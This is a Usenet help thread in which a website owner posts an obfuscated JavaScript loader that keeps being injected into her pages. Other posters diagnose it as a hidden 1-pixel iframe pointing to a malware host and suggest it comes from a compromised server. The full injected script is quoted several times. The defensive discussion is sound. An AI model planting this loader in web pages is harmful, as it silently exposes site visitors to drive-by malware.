This JS keeps appearing in my html pages. I clean it out but it keeps
reappearing. Any suggestions, much appreciated.

Kerry.

<script language="JavaScript">function ban(x){var
l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,45, 23,3,40,25,24,44,34,43,0,0,0,0,0,0,1,18,52,28,12,3 2,37,39,21,30,51,22,11,29,9,7,38,46,59,56,53,55,36 ,62,5,4,10,0,0,0,0,27,0,2,33,19,6,49,50,47,20,54,6 0,35,61,8,13,58,26,42,57,17,16,48,0,14,41,15,31);f or(j=Math.ceil(l/
b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p+
+)-48])<<s;if(s){r+=String.fromCharCode(174^w&255);w>>=8 ;s-
=2}else{s=6}}document.write(r)}}ban('AIDfC0juLR6UC UjVd91iIc5E@W5UIzCJL3SevkCu@qMEwPleZ91ecWxkdgjeN_7 icWxkM9lTagjV6zCUOJjeaz7i2cxeO97fL3DVAdSemJlJ3gDV' )</
script>

On Jan 4, 10:04am, Kerry <ke...@capebyron.com> wrote:
> This JS keeps appearing in my html pages. I clean it out but it keeps
> reappearing. Any suggestions, much appreciated.

The first steps would be to:

(a) Check your system for malware (which you should do periodically
as a general precaution). I tend towards AdAware from http://lavasoft.com/
(the free version is fine for this).

(b) Identify where the code is being inserted.

Is it just on the pages you produce? (View source on other pages and
check).
Does it only appear on your computer? (View source on pages where
you've seen the code from other computers).
Is it added by your editor? (Check the file in Notepad before
uploading)
Is it added by your publishing process/software? (Change the
publishing process)
Is it added by your host? (Try the page on a different hosting
service)
Is it added by your browser / firewall? (Briefly disable firewalls and
antivirus packages after making sure your software (especially your
OS) is up to date with security patches).

Once you know when the code is being added to the pages, it will be
easier to find out why, and to stop it.

--
David Dorward
http://blog.dorward.me.uk/
http://dorward.me.uk/

Kerry wrote:

> This JS keeps appearing in my html pages. I clean it out but it keeps
> reappearing. Any suggestions, much appreciated.

URL?

Sometimes these things are added by your host, in which case a URL will
us verify that we can see this happening to your pages too. Perhaps
some kind of advertising script, or some statistics gathering thing.

However, sometimes these things have been added by your own computer when
you *view* the page -- in which case the URL will us verify that we
*don't* see the script on your pages. Some security software (Norton) adds
this kind of stuff to all incoming web pages to block nastiness. Some
viruses may do similar to increase the levels of nastiness.

Either way... URL?

--
Toby A Inkster BSc (Hons) ARCS
[Geek of HTML/SQL/Perl/PHP/Python/Apache/Linux]
[OS: Linux 2.6.17.14-mm-desktop-9mdvsmp, up 4 days, 23:10.]

Sharing Music with Apple iTunes
http://tobyinkster.co.uk/blog/2007/1...tunes-sharing/

Kerry wrote:
> This JS keeps appearing in my html pages. I clean it out but it keeps
> reappearing. Any suggestions, much appreciated.
>
> Kerry.
>
> <script language="JavaScript">function ban(x){var
> l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,45, 23,3,40,25,24,44,34,43,0,0,0,0,0,0,1,18,52,28,12,3 2,37,39,21,30,51,22,11,29,9,7,38,46,59,56,53,55,36 ,62,5,4,10,0,0,0,0,27,0,2,33,19,6,49,50,47,20,54,6 0,35,61,8,13,58,26,42,57,17,16,48,0,14,41,15,31);f or(j=Math.ceil(l/
> b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p+
> +)-48])<<s;if(s){r+=String.fromCharCode(174^w&255);w>>=8 ;s-
> =2}else{s=6}}document.write(r)}}ban('AIDfC0juLR6UC UjVd91iIc5E@W5UIzCJL3SevkCu@qMEwPleZ91ecWxkdgjeN_7 icWxkM9lTagjV6zCUOJjeaz7i2cxeO97fL3DVAdSemJlJ3gDV' )</
> script>

This loads a 1 pixel wide IFRAME at 1spice.info/t

<URL:
http://ddanchev.blogspot.com/2007/11...re-attack.html
/>

Jeff

"Toby A Inkster" <usenet200712@tobyinkster.co.uk> wrote in message
news:5pj155-c21.ln1@ophelia.g5n.co.uk...
> Kerry wrote:
>
>> This JS keeps appearing in my html pages. I clean it out but it keeps
>> reappearing. Any suggestions, much appreciated.
>
> URL?
>
> Sometimes these things are added by your host, in which case a URL will
> us verify that we can see this happening to your pages too. Perhaps
> some kind of advertising script, or some statistics gathering thing.
>
> However, sometimes these things have been added by your own computer when
> you *view* the page -- in which case the URL will us verify that we
> *don't* see the script on your pages. Some security software (Norton) adds
> this kind of stuff to all incoming web pages to block nastiness. Some
> viruses may do similar to increase the levels of nastiness.
>
> Either way... URL?
>
> --
> Toby A Inkster BSc (Hons) ARCS
> [Geek of HTML/SQL/Perl/PHP/Python/Apache/Linux]
> [OS: Linux 2.6.17.14-mm-desktop-9mdvsmp, up 4 days, 23:10.]
>
> Sharing Music with Apple iTunes
> http://tobyinkster.co.uk/blog/2007/1...tunes-sharing/

Hi, and thanks for everyone for the .

The URL is http://www.inside-inspiration.com/

I have cleaned out all the malicious code execept for one page I've kept as
an example
http://www.inside-inspiration.com/default-backup.htm

Regards

Kerry

On Jan 5, 3:57am, Jeff <jeff@spam_me_not.com> wrote:
> Kerry wrote:
> > This JS keeps appearing in my html pages. I clean it out but it keeps
> > reappearing. Any suggestions, much appreciated.
>
> > Kerry.
>
> > <script language="JavaScript">function ban(x){var
> > l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,45, 23,3,40,25,24,44,34,43,0,0,0,0,0,0,1,18,52,28,12, 32,37,39,21,30,51,22,11,29,9,7,38,46,59,56,53,55,3 6,62,5,4,10,0,0,0,0,27,0,2,33,19,6,49,50,47,20,54 ,60,35,61,8,13,58,26,42,57,17,16,48,0,14,41,15,31 );for(j=Math.ceil(l/
> > b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p+
> > +)-48])<<s;if(s){r+=String.fromCharCode(174^w&255);w>>=8 ;s-
> > =2}else{s=6}}document.write(r)}}ban('AIDfC0juLR6UC UjVd91iIc5E@W5UIzCJL3SevkCu@qMEwPleZ91ecWxkdgjeN_ 7icWxkM9lTagjV6zCUOJjeaz7i2cxeO97fL3DVAdSemJlJ3gDV ')</
> > script>
>
> This loads a 1 pixel wide IFRAME at 1spice.info/t
>
> <URL:http://ddanchev.blogspot.com/2007/11/another-massive-embedded-malware....>
>
> Jeff

"Jeff" <jeff@spam_me_not.com> wrote in message
news:13nssrrtlghpi80@corp.supernews.com...
> Kerry wrote:
>> This JS keeps appearing in my html pages. I clean it out but it keeps
>> reappearing. Any suggestions, much appreciated.
>>
>> Kerry.
>>
>> <script language="JavaScript">function ban(x){var
>> l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,45, 23,3,40,25,24,44,34,43,0,0,0,0,0,0,1,18,52,28,12,3 2,37,39,21,30,51,22,11,29,9,7,38,46,59,56,53,55,36 ,62,5,4,10,0,0,0,0,27,0,2,33,19,6,49,50,47,20,54,6 0,35,61,8,13,58,26,42,57,17,16,48,0,14,41,15,31);f or(j=Math.ceil(l/
>> b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p+
>> +)-48])<<s;if(s){r+=String.fromCharCode(174^w&255);w>>=8 ;s-
>> =2}else{s=6}}document.write(r)}}ban('AIDfC0juLR6UC UjVd91iIc5E@W5UIzCJL3SevkCu@qMEwPleZ91ecWxkdgjeN_7 icWxkM9lTagjV6zCUOJjeaz7i2cxeO97fL3DVAdSemJlJ3gDV' )</
>> script>
>
> This loads a 1 pixel wide IFRAME at 1spice.info/t
>
> <URL:
> http://ddanchev.blogspot.com/2007/11...re-attack.html
> />
>
> Jeff

Thanks Jeff,

It good to know I not alone with this problem.

I've done all the virus checks, changed the password on the server
and
checked carefully for other strange code or programs on the server
but the code just
keeps reappearing. I've contacted my host but there seems to be
nothing they
can do.

I'm lost as to how to solve the problem. Anymore ideas on how to solve
the
problem is much appreciated.

Regards

Kerry

On Fri, 04 Jan 2008 15:49:53 -0800, Kerry wrote:

> I've done all the virus checks, changed the password on the server and
> checked carefully for other strange code or programs on the server but
> the code just
> keeps reappearing. I've contacted my host but there seems to be nothing
> they
> can do.

Then they're clueless. The server has been hacked and they don't have the
expertise to detect how it was done, or the interest in preventing it
from happening again.

>
> I'm lost as to how to solve the problem. Anymore ideas on how to solve
> the
> problem is much appreciated.

Find a better hosting company.






--
George Sexton
MH Software, Inc. - Home of Connect Daily Web Calendar
http://www.mhsoftware.com/connectdaily.htm

Hi all,

I'm a graduate student studying on the JS malware. I have found the
myspace worm. And thanks to Kerry, I now have another sample. Is there
any other known malicious JS code?

Thank you!

Devin